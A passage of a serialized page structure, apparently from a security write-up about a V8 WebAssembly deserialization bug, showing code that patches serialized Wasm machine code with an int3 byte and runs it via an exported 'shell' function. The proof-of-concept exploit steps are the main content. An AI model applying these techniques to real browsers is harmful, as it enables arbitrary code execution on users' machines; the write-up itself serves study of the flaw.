inst",{"type":28,"tag":116,"props":133444,"children":133445},{"style":370},[133446],{"type":33,"value":2226},{"type":28,"tag":116,"props":133448,"children":133449},{"style":376},[133450],{"type":33,"value":31582},{"type":28,"tag":116,"props":133452,"children":133453},{"style":272},[133454],{"type":33,"value":133409},{"type":28,"tag":116,"props":133456,"children":133457},{"style":266},[133458],{"type":33,"value":141},{"type":28,"tag":116,"props":133460,"children":133461},{"style":282},[133462],{"type":33,"value":133463},"Instance",{"type":28,"tag":116,"props":133465,"children":133466},{"style":266},[133467],{"type":33,"value":313},{"type":28,"tag":116,"props":133469,"children":133470},{"style":272},[133471],{"type":33,"value":133472},"mod",{"type":28,"tag":116,"props":133474,"children":133475},{"style":266},[133476],{"type":33,"value":895},{"type":28,"tag":116,"props":133478,"children":133479},{"class":245,"line":614},[133480,133484,133488,133492,133496,133500,133504,133508,133513],{"type":28,"tag":116,"props":133481,"children":133482},{"style":376},[133483],{"type":33,"value":34674},{"type":28,"tag":116,"props":133485,"children":133486},{"style":272},[133487],{"type":33,"value":79628},{"type":28,"tag":116,"props":133489,"children":133490},{"style":370},[133491],{"type":33,"value":2226},{"type":28,"tag":116,"props":133493,"children":133494},{"style":272},[133495],{"type":33,"value":133442},{"type":28,"tag":116,"props":133497,"children":133498},{"style":266},[133499],{"type":33,"value":141},{"type":28,"tag":116,"props":133501,"children":133502},{"style":272},[133503],{"type":33,"value":37509},{"type":28,"tag":116,"props":133505,"children":133506},{"style":266},[133507],{"type":33,"value":141},{"type":28,"tag":116,"props":133509,"children":133510},{"style":272},[133511],{"type":33,"value":133512},"shell",{"type":28,"tag":116,"props":133514,"children":133515},{"style":266},[133516],{"type":33,"value":384},{"type":28,"tag":116,"props":133518,"children":133519},{"class":245,"line":631},[133520],{"type":28,"tag":116,"props":133521,"children":133522},{"emptyLinePlaceholder":19},[133523],{"type":33,"value":1044},{"type":28,"tag":116,"props":133525,"children":133526},{"class":245,"line":665},[133527,133531,133536,133540,133544],{"type":28,"tag":116,"props":133528,"children":133529},{"style":370},[133530],{"type":33,"value":56007},{"type":28,"tag":116,"props":133532,"children":133533},{"style":282},[133534],{"type":33,"value":133535},"WasmTierUpFunction",{"type":28,"tag":116,"props":133537,"children":133538},{"style":266},[133539],{"type":33,"value":313},{"type":28,"tag":116,"props":133541,"children":133542},{"style":272},[133543],{"type":33,"value":75920},{"type":28,"tag":116,"props":133545,"children":133546},{"style":266},[133547],{"type":33,"value":895},{"type":28,"tag":116,"props":133549,"children":133550},{"class":245,"line":713},[133551,133555,133560,133564,133569,133573,133577,133581],{"type":28,"tag":116,"props":133552,"children":133553},{"style":376},[133554],{"type":33,"value":34674},{"type":28,"tag":116,"props":133556,"children":133557},{"style":272},[133558],{"type":33,"value":133559}," serialized",{"type":28,"tag":116,"props":133561,"children":133562},{"style":370},[133563],{"type":33,"value":2226},{"type":28,"tag":116,"props":133565,"children":133566},{"style":370},[133567],{"type":33,"value":133568}," %",{"type":28,"tag":116,"props":133570,"children":133571},{"style":282},[133572],{"type":33,"value":132567},{"type":28,"tag":116,"props":133574,"children":133575},{"style":266},[133576],{"type":33,"value":313},{"type":28,"tag":116,"props":133578,"children":133579},{"style":272},[133580],{"type":33,"value":133472},{"type":28,"tag":116,"props":133582,"children":133583},{"style":266},[133584],{"type":33,"value":895},{"type":28,"tag":116,"props":133586,"children":133587},{"class":245,"line":750},[133588,133592,133596,133600,133604,133608,133612,133617],{"type":28,"tag":116,"props":133589,"children":133590},{"style":376},[133591],{"type":33,"value":11455},{"type":28,"tag":116,"props":133593,"children":133594},{"style":272},[133595],{"type":33,"value":8828},{"type":28,"tag":116,"props":133597,"children":133598},{"style":370},[133599],{"type":33,"value":2226},{"type":28,"tag":116,"props":133601,"children":133602},{"style":376},[133603],{"type":33,"value":31582},{"type":28,"tag":116,"props":133605,"children":133606},{"style":282},[133607],{"type":33,"value":133078},{"type":28,"tag":116,"props":133609,"children":133610},{"style":266},[133611],{"type":33,"value":313},{"type":28,"tag":116,"props":133613,"children":133614},{"style":272},[133615],{"type":33,"value":133616},"serialized",{"type":28,"tag":116,"props":133618,"children":133619},{"style":266},[133620],{"type":33,"value":895},{"type":28,"tag":116,"props":133622,"children":133623},{"class":245,"line":779},[133624,133629,133633,133637,133641,133646,133650,133654,133658,133663,133667,133672,133676,133680,133685],{"type":28,"tag":116,"props":133625,"children":133626},{"style":272},[133627],{"type":33,"value":133628},"console",{"type":28,"tag":116,"props":133630,"children":133631},{"style":266},[133632],{"type":33,"value":141},{"type":28,"tag":116,"props":133634,"children":133635},{"style":282},[133636],{"type":33,"value":101567},{"type":28,"tag":116,"props":133638,"children":133639},{"style":266},[133640],{"type":33,"value":313},{"type":28,"tag":116,"props":133642,"children":133643},{"style":563},[133644],{"type":33,"value":133645},"'['",{"type":28,"tag":116,"props":133647,"children":133648},{"style":370},[133649],{"type":33,"value":2258},{"type":28,"tag":116,"props":133651,"children":133652},{"style":272},[133653],{"type":33,"value":8828},{"type":28,"tag":116,"props":133655,"children":133656},{"style":266},[133657],{"type":33,"value":141},{"type":28,"tag":116,"props":133659,"children":133660},{"style":282},[133661],{"type":33,"value":133662},"join",{"type":28,"tag":116,"props":133664,"children":133665},{"style":266},[133666],{"type":33,"value":313},{"type":28,"tag":116,"props":133668,"children":133669},{"style":563},[133670],{"type":33,"value":133671},"', '",{"type":28,"tag":116,"props":133673,"children":133674},{"style":266},[133675],{"type":33,"value":1609},{"type":28,"tag":116,"props":133677,"children":133678},{"style":370},[133679],{"type":33,"value":2268},{"type":28,"tag":116,"props":133681,"children":133682},{"style":563},[133683],{"type":33,"value":133684}," ']'",{"type":28,"tag":116,"props":133686,"children":133687},{"style":266},[133688],{"type":33,"value":895},{"type":28,"tag":29,"props":133690,"children":133691},{},[133692],{"type":33,"value":133693},"This produces the following output:",{"type":28,"tag":234,"props":133695,"children":133697},{"code":133696},"[147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 85, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93, 195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0]\n",[133698],{"type":28,"tag":98,"props":133699,"children":133700},{"__ignoreMap":7},[133701],{"type":33,"value":133696},{"type":28,"tag":29,"props":133703,"children":133704},{},[133705,133707,133713,133715,133721,133723,133729,133730,133736,133738,133743],{"type":33,"value":133706},"The bytes ",{"type":28,"tag":98,"props":133708,"children":133710},{"className":133709},[],[133711],{"type":33,"value":133712},"85, 72, 137, 229, ...",{"type":33,"value":133714}," correspond to the x86-64 function prologue (",{"type":28,"tag":98,"props":133716,"children":133718},{"className":133717},[],[133719],{"type":33,"value":133720},"push rbp; mov rbp, rsp",{"type":33,"value":133722},"). We replace the first byte with ",{"type":28,"tag":98,"props":133724,"children":133726},{"className":133725},[],[133727],{"type":33,"value":133728},"0xcc",{"type":33,"value":16121},{"type":28,"tag":98,"props":133731,"children":133733},{"className":133732},[],[133734],{"type":33,"value":133735},"int3",{"type":33,"value":133737}," opcode), and use this modified buffer as the serialized input to ",{"type":28,"tag":98,"props":133739,"children":133741},{"className":133740},[],[133742],{"type":33,"value":132541},{"type":33,"value":4160},{"type":28,"tag":234,"props":133745,"children":133747},{"code":133746,"language":35241,"meta":7,"className":35239,"style":7},"(async () => {\n  const wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  const buffer = new Uint8Array([\n    147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64,\n    0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0,\n    0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 204, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93,\n    195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0,\n  ]);\n  let r = bug(wasm_code, buffer.buffer);\n  result = (await r.next()).value;\n  const wasm_instance = new WebAssembly.Instance(result);\n  const f = wasm_instance.exports.shell;\n  f();\n})();\n",[133748],{"type":28,"tag":98,"props":133749,"children":133750},{"__ignoreMap":7},[133751,133774,133801,134021,134088,134096,134123,134337,134589,134840,135066,135310,135530,135537,135586,135631,135675,135714,135726],{"type":28,"tag":116,"props":133752,"children":133753},{"class":245,"line":246},[133754,133758,133762,133766,133770],{"type":28,"tag":116,"props":133755,"children":133756},{"style":266},[133757],{"type":33,"value":313},{"type":28,"tag":116,"props":133759,"children":133760},{"style":376},[133761],{"type":33,"value":35771},{"type":28,"tag":116,"props":133763,"children":133764},{"style":266},[133765],{"type":33,"value":39316},{"type":28,"tag":116,"props":133767,"children":133768},{"style":376},[133769],{"type":33,"value":1286},{"type":28,"tag":116,"props":133771,"children":133772},{"style":266},[133773],{"type":33,"value":1291},{"type":28,"tag":116,"props":133775,"children":133776},{"class":245,"line":256},[133777,133781,133785,133789,133793,133797],{"type":28,"tag":116,"props":133778,"children":133779},{"style":376},[133780],{"type":33,"value":35814},{"type":28,"tag":116,"props":133782,"children":133783},{"style":272},[133784],{"type":33,"value":133065},{"type":28,"tag":116,"props":133786,"children":133787},{"style":370},[133788],{"type":33,"value":2226},{"type":28,"tag":116,"props":133790,"children":133791},{"style":376},[133792],{"type":33,"value":31582},{"type":28,"tag":116,"props":133794,"children":133795},{"style":282},[133796],{"type":33,"value":133078},{"type":28,"tag":116,"props":133798,"children":133799},{"style":266},[133800],{"type":33,"value":133083},{"type":28,"tag":116,"props":133802,"children":133803},{"class":245,"line":293},[133804,133809,133813,133817,133821,133825,133829,133833,133837,133841,133845,133849,133853,133857,133861,133865,133869,133873,133877,133881,133885,133889,133893,133897,133901,133905,133909,133913,133917,133921,133925,133929,133933,133937,133941,133945,133949,133953,133957,133961,133965,133969,133973,133977,133981,133985,133989,133993,133997,134001,134005,134009,134013,134017],{"type":28,"tag":116,"props":133805,"children":133806},{"style":350},[133807],{"type":33,"value":133808},"    0",{"type":28,"tag":116,"props":133810,"children":133811},{"style":266},[133812],{"type":33,"value":825},{"type":28,"tag":116,"props":133814,"children":133815},{"style":350},[133816],{"type":33,"value":133100},{"type":28,"tag":116,"props":133818,"children":133819},{"style":266},[133820],{"type":33,"value":825},{"type":28,"tag":116,"props":133822,"children":133823},{"style":350},[133824],{"type":33,"value":133109},{"type":28,"tag":116,"props":133826,"children":133827},{"style":266},[133828],{"type":33,"value":825},{"type":28,"tag":116,"props":133830,"children":133831},{"style":350},[133832],{"type":33,"value":133118},{"type":28,"tag":116,"props":133834,"children":133835},{"style":266},[133836],{"type":33,"value":825},{"type":28,"tag":116,"props":133838,"children":133839},{"style":350},[133840],{"type":33,"value":1824},{"type":28,"tag":116,"props":133842,"children":133843},{"style":266},[133844],{"type":33,"value":825},{"type":28,"tag":116,"props":133846,"children":133847},{"style":350},[133848],{"type":33,"value":353},{"type":28,"tag":116,"props":133850,"children":133851},{"style":266},[133852],{"type":33,"value":825},{"type":28,"tag":116,"props":133854,"children":133855},{"style":350},[133856],{"type":33,"value":353},{"type":28,"tag":116,"props":133858,"children":133859},{"style":266},[133860],{"type":33,"value":825},{"type":28,"tag":116,"props":133862,"children":133863},{"style":350},[133864],{"type":33,"value":353},{"type":28,"tag":116,"props":133866,"children":133867},{"style":266},[133868],{"type":33,"value":825},{"type":28,"tag":116,"props":133870,"children":133871},{"style":350},[133872],{"type":33,"value":1824},{"type":28,"tag":116,"props":133874,"children":133875},{"style":266},[133876],{"type":33,"value":825},{"type":28,"tag":116,"props":133878,"children":133879},{"style":350},[133880],{"type":33,"value":17190},{"type":28,"tag":116,"props":133882,"children":133883},{"style":266},[133884],{"type":33,"value":825},{"type":28,"tag":116,"props":133886,"children":133887},{"style":350},[133888],{"type":33,"value":1824},{"type":28,"tag":116,"props":133890,"children":133891},{"style":266},[133892],{"type":33,"value":825},{"type":28,"tag":116,"props":133894,"children":133895},{"style":350},[133896],{"type":33,"value":133183},{"type":28,"tag":116,"props":133898,"children":133899},{"style":266},[133900],{"type":33,"value":825},{"type":28,"tag":116,"props":133902,"children":133903},{"style":350},[133904],{"type":33,"value":353},{"type":28,"tag":116,"props":133906,"children":133907},{"style":266},[133908],{"type":33,"value":825},{"type":28,"tag":116,"props":133910,"children":133911},{"style":350},[133912],{"type":33,"value":353},{"type":28,"tag":116,"props":133914,"children":133915},{"style":266},[133916],{"type":33,"value":825},{"type":28,"tag":116,"props":133918,"children":133919},{"style":350},[133920],{"type":33,"value":16957},{"type":28,"tag":116,"props":133922,"children":133923},{"style":266},[133924],{"type":33,"value":825},{"type":28,"tag":116,"props":133926,"children":133927},{"style":350},[133928],{"type":33,"value":2794},{"type":28,"tag":116,"props":133930,"children":133931},{"style":266},[133932],{"type":33,"value":825},{"type":28,"tag":116,"props":133934,"children":133935},{"style":350},[133936],{"type":33,"value":1824},{"type":28,"tag":116,"props":133938,"children":133939},{"style":266},[133940],{"type":33,"value":825},{"type":28,"tag":116,"props":133942,"children":133943},{"style":350},[133944],{"type":33,"value":353},{"type":28,"tag":116,"props":133946,"children":133947},{"style":266},[133948],{"type":33,"value":825},{"type":28,"tag":116,"props":133950,"children":133951},{"style":350},[133952],{"type":33,"value":54289},{"type":28,"tag":116,"props":133954,"children":133955},{"style":266},[133956],{"type":33,"value":825},{"type":28,"tag":116,"props":133958,"children":133959},{"style":350},[133960],{"type":33,"value":55504},{"type":28,"tag":116,"props":133962,"children":133963},{"style":266},[133964],{"type":33,"value":825},{"type":28,"tag":116,"props":133966,"children":133967},{"style":350},[133968],{"type":33,"value":1824},{"type":28,"tag":116,"props":133970,"children":133971},{"style":266},[133972],{"type":33,"value":825},{"type":28,"tag":116,"props":133974,"children":133975},{"style":350},[133976],{"type":33,"value":17771},{"type":28,"tag":116,"props":133978,"children":133979},{"style":266},[133980],{"type":33,"value":825},{"type":28,"tag":116,"props":133982,"children":133983},{"style":350},[133984],{"type":33,"value":133109},{"type":28,"tag":116,"props":133986,"children":133987},{"style":266},[133988],{"type":33,"value":825},{"type":28,"tag":116,"props":133990,"children":133991},{"style":350},[133992],{"type":33,"value":133280},{"type":28,"tag":116,"props":133994,"children":133995},{"style":266},[133996],{"type":33,"value":825},{"type":28,"tag":116,"props":133998,"children":133999},{"style":350},[134000],{"type":33,"value":133289},{"type":28,"tag":116,"props":134002,"children":134003},{"style":266},[134004],{"type":33,"value":825},{"type":28,"tag":116,"props":134006,"children":134007},{"style":350},[134008],{"type":33,"value":133298},{"type":28,"tag":116,"props":134010,"children":134011},{"style":266},[134012],{"type":33,"value":825},{"type":28,"tag":116,"props":134014,"children":134015},{"style":350},[134016],{"type":33,"value":133298},{"type":28,"tag":116,"props":134018,"children":134019},{"style":266},[134020],{"type":33,"value":3178},{"type":28,"tag":116,"props":134022,"children":134023},{"class":245,"line":361},[134024,134028,134032,134036,134040,134044,134048,134052,134056,134060,134064,134068,134072,134076,134080,134084],{"type":28,"tag":116,"props":134025,"children":134026},{"style":350},[134027],{"type":33,"value":133808},{"type":28,"tag":116,"props":134029,"children":134030},{"style":266},[134031],{"type":33,"value":825},{"type":28,"tag":116,"props":134033,"children":134034},{"style":350},[134035],{"type":33,"value":353},{"type":28,"tag":116,"props":134037,"children":134038},{"style":266},[134039],{"type":33,"value":825},{"type":28,"tag":116,"props":134041,"children":134042},{"style":350},[134043],{"type":33,"value":88871},{"type":28,"tag":116,"props":134045,"children":134046},{"style":266},[134047],{"type":33,"value":825},{"type":28,"tag":116,"props":134049,"children":134050},{"style":350},[134051],{"type":33,"value":17190},{"type":28,"tag":116,"props":134053,"children":134054},{"style":266},[134055],{"type":33,"value":825},{"type":28,"tag":116,"props":134057,"children":134058},{"style":350},[134059],{"type":33,"value":1824},{"type":28,"tag":116,"props":134061,"children":134062},{"style":266},[134063],{"type":33,"value":825},{"type":28,"tag":116,"props":134065,"children":134066},{"style":350},[134067],{"type":33,"value":2794},{"type":28,"tag":116,"props":134069,"children":134070},{"style":266},[134071],{"type":33,"value":825},{"type":28,"tag":116,"props":134073,"children":134074},{"style":350},[134075],{"type":33,"value":353},{"type":28,"tag":116,"props":134077,"children":134078},{"style":266},[134079],{"type":33,"value":825},{"type":28,"tag":116,"props":134081,"children":134082},{"style":350},[134083],{"type":33,"value":133374},{"type":28,"tag":116,"props":134085,"children":134086},{"style":266},[134087],{"type":33,"value":3178},{"type":28,"tag":116,"props":134089,"children":134090},{"class":245,"line":387},[134091],{"type":28,"tag":116,"props":134092,"children":134093},{"style":266},[134094],{"type":33,"value":134095},"  ]);\n",{"type":28,"tag":116,"props":134097,"children":134098},{"class":245,"line":400},[134099,134103,134107,134111,134115,134119],{"type":28,"tag":116,"props":134100,"children":134101},{"style":376},[134102],{"type":33,"value":35814},{"type":28,"tag":116,"props":134104,"children":134105},{"style":272},[134106],{"type":33,"value":124880},{"type":28,"tag":116,"props":134108,"children":134109},{"style":370},[134110],{"type":33,"value":2226},{"type":28,"tag":116,"props":134112,"children":134113},{"style":376},[134114],{"type":33,"value":31582},{"type":28,"tag":116,"props":134116,"children":134117},{"style":282},[134118],{"type":33,"value":133078},{"type":28,"tag":116,"props":134120,"children":134121},{"style":266},[134122],{"type":33,"value":133083},{"type":28,"tag":116,"props":134124,"children":134125},{"class":245,"line":614},[134126,134131,134135,134139,134143,134148,134152,134157,134161,134166,134170,134175,134179,134184,134188,134193,134197,134202,134206,134211,134215,134219,134223,134227,134231,134236,134240,134245,134249,134253,134257,134261,134265,134269,134273,134277,134281,134285,134289,134293,134297,134301,134305,134309,134313,134317,134321,134325,134329,134333],{"type":28,"tag":116,"props":134127,"children":134128},{"style":350},[134129],{"type":33,"value":134130},"    147",{"type":28,"tag":116,"props":134132,"children":134133},{"style":266},[134134],{"type":33,"value":825},{"type":28,"tag":116,"props":134136,"children":134137},{"style":350},[134138],{"type":33,"value":18083},{"type":28,"tag":116,"props":134140,"children":134141},{"style":266},[134142],{"type":33,"value":825},{"type":28,"tag":116,"props":134144,"children":134145},{"style":350},[134146],{"type":33,"value":134147},"222",{"type":28,"tag":116,"props":134149,"children":134150},{"style":266},[134151],{"type":33,"value":825},{"type":28,"tag":116,"props":134153,"children":134154},{"style":350},[134155],{"type":33,"value":134156},"192",{"type":28,"tag":116,"props":134158,"children":134159},{"style":266},[134160],{"type":33,"value":825},{"type":28,"tag":116,"props":134162,"children":134163},{"style":350},[134164],{"type":33,"value":134165},"20",{"type":28,"tag":116,"props":134167,"children":134168},{"style":266},[134169],{"type":33,"value":825},{"type":28,"tag":116,"props":134171,"children":134172},{"style":350},[134173],{"type":33,"value":134174},"119",{"type":28,"tag":116,"props":134176,"children":134177},{"style":266},[134178],{"type":33,"value":825},{"type":28,"tag":116,"props":134180,"children":134181},{"style":350},[134182],{"type":33,"value":134183},"44",{"type":28,"tag":116,"props":134185,"children":134186},{"style":266},[134187],{"type":33,"value":825},{"type":28,"tag":116,"props":134189,"children":134190},{"style":350},[134191],{"type":33,"value":134192},"43",{"type":28,"tag":116,"props":134194,"children":134195},{"style":266},[134196],{"type":33,"value":825},{"type":28,"tag":116,"props":134198,"children":134199},{"style":350},[134200],{"type":33,"value":134201},"127",{"type":28,"tag":116,"props":134203,"children":134204},{"style":266},[134205],{"type":33,"value":825},{"type":28,"tag":116,"props":134207,"children":134208},{"style":350},[134209],{"type":33,"value":134210},"62",{"type":28,"tag":116,"props":134212,"children":134213},{"style":266},[134214],{"type":33,"value":825},{"type":28,"tag":116,"props":134216,"children":134217},{"style":350},[134218],{"type":33,"value":16957},{"type":28,"tag":116,"props":134220,"children":134221},{"style":266},[134222],{"type":33,"value":825},{"type":28,"tag":116,"props":134224,"children":134225},{"style":350},[134226],{"type":33,"value":353},{"type":28,"tag":116,"props":134228,"children":134229},{"style":266},[134230],{"type":33,"value":825},{"type":28,"tag":116,"props":134232,"children":134233},{"style":350},[134234],{"type":33,"value":134235},"159",{"type":28,"tag":116,"props":134237,"children":134238},{"style":266},[134239],{"type":33,"value":825},{"type":28,"tag":116,"props":134241,"children":134242},{"style":350},[134243],{"type":33,"value":134244},"206",{"type":28,"tag":116,"props":134246,"children":134247},{"style":266},[134248],{"type":33,"value":825},{"type":28,"tag":116,"props":134250,"children":134251},{"style":350},[134252],{"type":33,"value":43774},{"type":28,"tag":116,"props":134254,"children":134255},{"style":266},[134256],{"type":33,"value":825},{"type":28,"tag":116,"props":134258,"children":134259},{"style":350},[134260],{"type":33,"value":134192},{"type":28,"tag":116,"props":134262,"children":134263},{"style":266},[134264],{"type":33,"value":825},{"type":28,"tag":116,"props":134266,"children":134267},{"style":350},[134268],{"type":33,"value":353},{"type":28,"tag":116,"props":134270,"children":134271},{"style":266},[134272],{"type":33,"value":825},{"type":28,"tag":116,"props":134274,"children":134275},{"style":350},[134276],{"type":33,"value":353},{"type":28,"tag":116,"props":134278,"children":134279},{"style":266},[134280],{"type":33,"value":825},{"type":28,"tag":116,"props":134282,"children":134283},{"style":350},[134284],{"type":33,"value":16957},{"type":28,"tag":116,"props":134286,"children":134287},{"style":266},[134288],{"type":33,"value":825},{"type":28,"tag":116,"props":134290,"children":134291},{"style":350},[134292],{"type":33,"value":353},{"type":28,"tag":116,"props":134294,"children":134295},{"style":266},[134296],{"type":33,"value":825},{"type":28,"tag":116,"props":134298,"children":134299},{"style":350},[134300],{"type":33,"value":353},{"type":28,"tag":116,"props":134302,"children":134303},{"style":266},[134304],{"type":33,"value":825},{"type":28,"tag":116,"props":134306,"children":134307},{"style":350},[134308],{"type":33,"value":353},{"type":28,"tag":116,"props":134310,"children":134311},{"style":266},[134312],{"type":33,"value":825},{"type":28,"tag":116,"props":134314,"children":134315},{"style":350},[134316],{"type":33,"value":353},{"type":28,"tag":116,"props":134318,"children":134319},{"style":266},[134320],{"type":33,"value":825},{"type":28,"tag":116,"props":134322,"children":134323},{"style":350},[134324],{"type":33,"value":353},{"type":28,"tag":116,"props":134326,"children":134327},{"style":266},[134328],{"type":33,"value":825},{"type":28,"tag":116,"props":134330,"children":134331},{"style":350},[134332],{"type":33,"value":29078},{"type":28,"tag":116,"props":134334,"children":134335},{"style":266},[134336],{"type":33,"value":3178},{"type":28,"tag":116,"props":134338,"children":134339},{"class":245,"line":631},[134340,134344,134348,134352,134356,134360,134364,134368,134372,134376,134380,134384,134388,134392,134396,134400,134404,134408,134412,134416,134420,134424,134428,134432,134436,134440,134444,134448,134452,134456,134460,134464,134468,134472,134476,134481,134485,134489,134493,134497,134501,134505,134509,134513,134517,134521,134525,134529,134533,134537,134541,134545,134549,134553,134557,134561,134565,134569,134573,134577,134581,134585],{"type":28,"tag":116,"props":134341,"children":134342},{"style":350},[134343],{"type":33,"value":133808},{"type":28,"tag":116,"props":134345,"children":134346},{"style":266},[134347],{"type":33,"value":825},{"type":28,"tag":116,"props":134349,"children":134350},{"style":350},[134351],{"type":33,"value":353},{"type":28,"tag":116,"props":134353,"children":134354},{"style":266},[134355],{"type":33,"value":825},{"type":28,"tag":116,"props":134357,"children":134358},{"style":350},[134359],{"type":33,"value":353},{"type":28,"tag":116,"props":134361,"children":134362},{"style":266},[134363],{"type":33,"value":825},{"type":28,"tag":116,"props":134365,"children":134366},{"style":350},[134367],{"type":33,"value":353},{"type":28,"tag":116,"props":134369,"children":134370},{"style":266},[134371],{"type":33,"value":825},{"type":28,"tag":116,"props":134373,"children":134374},{"style":350},[134375],{"type":33,"value":353},{"type":28,"tag":116,"props":134377,"children":134378},{"style":266},[134379],{"type":33,"value":825},{"type":28,"tag":116,"props":134381,"children":134382},{"style":350},[134383],{"type":33,"value":353},{"type":28,"tag":116,"props":134385,"children":134386},{"style":266},[134387],{"type":33,"value":825},{"type":28,"tag":116,"props":134389,"children":134390},{"style":350},[134391],{"type":33,"value":353},{"type":28,"tag":116,"props":134393,"children":134394},{"style":266},[134395],{"type":33,"value":825},{"type":28,"tag":116,"props":134397,"children":134398},{"style":350},[134399],{"type":33,"value":1824},{"type":28,"tag":116,"props":134401,"children":134402},{"style":266},[134403],{"type":33,"value":825},{"type":28,"tag":116,"props":134405,"children":134406},{"style":350},[134407],{"type":33,"value":353},{"type":28,"tag":116,"props":134409,"children":134410},{"style":266},[134411],{"type":33,"value":825},{"type":28,"tag":116,"props":134413,"children":134414},{"style":350},[134415],{"type":33,"value":353},{"type":28,"tag":116,"props":134417,"children":134418},{"style":266},[134419],{"type":33,"value":825},{"type":28,"tag":116,"props":134421,"children":134422},{"style":350},[134423],{"type":33,"value":353},{"type":28,"tag":116,"props":134425,"children":134426},{"style":266},[134427],{"type":33,"value":825},{"type":28,"tag":116,"props":134429,"children":134430},{"style":350},[134431],{"type":33,"value":353},{"type":28,"tag":116,"props":134433,"children":134434},{"style":266},[134435],{"type":33,"value":825},{"type":28,"tag":116,"props":134437,"children":134438},{"style":350},[134439],{"type":33,"value":353},{"type":28,"tag":116,"props":134441,"children":134442},{"style":266},[134443],{"type":33,"value":825},{"type":28,"tag":116,"props":134445,"children":134446},{"style":350},[134447],{"type":33,"value":353},{"type":28,"tag":116,"props":134449,"children":134450},{"style":266},[134451],{"type":33,"value":825},{"type":28,"tag":116,"props":134453,"children":134454},{"style":350},[134455],{"type":33,"value":353},{"type":28,"tag":116,"props":134457,"children":134458},{"style":266},[134459],{"type":33,"value":825},{"type":28,"tag":116,"props":134461,"children":134462},{"style":350},[134463],{"type":33,"value":353},{"type":28,"tag":116,"props":134465,"children":134466},{"style":266},[134467],{"type":33,"value":825},{"type":28,"tag":116,"props":134469,"children":134470},{"style":350},[134471],{"type":33,"value":17190},{"type":28,"tag":116,"props":134473,"children":134474},{"style":266},[134475],{"type":33,"value":825},{"type":28,"tag":116,"props":134477,"children":134478},{"style":350},[134479],{"type":33,"value":134480},"28",{"type":28,"tag":116,"props":134482,"children":134483},{"style":266},[134484],{"type":33,"value":825},{"type":28,"tag":116,"props":134486,"children":134487},{"style":350},[134488],{"type":33,"value":353},{"type":28,"tag":116,"props":134490,"children":134491},{"style":266},[134492],{"type":33,"value":825},{"type":28,"tag":116,"props":134494,"children":134495},{"style":350},[134496],{"type":33,"value":353},{"type":28,"tag":116,"props":134498,"children":134499},{"style":266},[134500],{"type":33,"value":825},{"type":28,"tag":116,"props":134502,"children":134503},{"style":350},[134504],{"type":33,"value":353},{"type":28,"tag":116,"props":134506,"children":134507},{"style":266},[134508],{"type":33,"value":825},{"type":28,"tag":116,"props":134510,"children":134511},{"style":350},[134512],{"type":33,"value":40467},{"type":28,"tag":116,"props":134514,"children":134515},{"style":266},[134516],{"type":33,"value":825},{"type":28,"tag":116,"props":134518,"children":134519},{"style":350},[134520],{"type":33,"value":353},{"type":28,"tag":116,"props":134522,"children":134523},{"style":266},[134524],{"type":33,"value":825},{"type":28,"tag":116,"props":134526,"children":134527},{"style":350},[134528],{"type":33,"value":353},{"type":28,"tag":116,"props":134530,"children":134531},{"style":266},[134532],{"type":33,"value":825},{"type":28,"tag":116,"props":134534,"children":134535},{"style":350},[134536],{"type":33,"value":353},{"type":28,"tag":116,"props":134538,"children":134539},{"style":266},[134540],{"type":33,"value":825},{"type":28,"tag":116,"props":134542,"children":134543},{"style":350},[134544],{"type":33,"value":134480},{"type":28,"tag":116,"props":134546,"children":134547},{"style":266},[134548],{"type":33,"value":825},{"type":28,"tag":116,"props":134550,"children":134551},{"style":350},[134552],{"type":33,"value":353},{"type":28,"tag":116,"props":134554,"children":134555},{"style":266},[134556],{"type":33,"value":825},{"type":28,"tag":116,"props":134558,"children":134559},{"style":350},[134560],{"type":33,"value":353},{"type":28,"tag":116,"props":134562,"children":134563},{"style":266},[134564],{"type":33,"value":825},{"type":28,"tag":116,"props":134566,"children":134567},{"style":350},[134568],{"type":33,"value":353},{"type":28,"tag":116,"props":134570,"children":134571},{"style":266},[134572],{"type":33,"value":825},{"type":28,"tag":116,"props":134574,"children":134575},{"style":350},[134576],{"type":33,"value":134480},{"type":28,"tag":116,"props":134578,"children":134579},{"style":266},[134580],{"type":33,"value":825},{"type":28,"tag":116,"props":134582,"children":134583},{"style":350},[134584],{"type":33,"value":353},{"type":28,"tag":116,"props":134586,"children":134587},{"style":266},[134588],{"type":33,"value":3178},{"type":28,"tag":116,"props":134590,"children":134591},{"class":245,"line":665},[13459